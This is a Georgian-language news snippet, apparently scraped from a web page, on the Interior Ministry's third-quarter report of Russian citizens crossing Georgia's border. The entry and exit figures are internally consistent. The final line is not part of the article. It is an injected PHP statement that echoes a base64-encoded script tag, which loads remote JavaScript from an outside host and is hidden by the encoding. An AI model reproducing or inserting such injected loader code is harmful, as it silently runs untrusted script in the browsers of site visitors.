celsiusi
ავერსი საქკაბელი

9 თვის განმავლობაში საქართველოში ყველაზე მეტი საზღვრის კვეთა სწორედ რუსეთის ფედერაციიდან დაფიქსირდა. 

შინაგან საქმეთა სამინისტრომ საზღვრის კვეთის მესამე კვარტალის ანგარიში გამოაქვეყნა.

ანგარიშის მიხედვით, მთლიანობაში რუსეთიდან 1,508,187 ვიზიტორი შემოვიდა, ხოლო საქართველო დატოვა რუსეთის 1,528,193 მოქალაქემ. შესაბამისად, ქვეყნიდან 20,006-ით მეტი რუსეთის მოქალაქე გავიდა, ვიდრე შემოვიდა. 

უშუალოდ მესამე კვარტალში კი საქართველოში რუსეთის ფედერაციის მოქალაქეთა 766,278 შემოსვლა და 780,514 გასვლა დაფიქსირდა. 

293
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");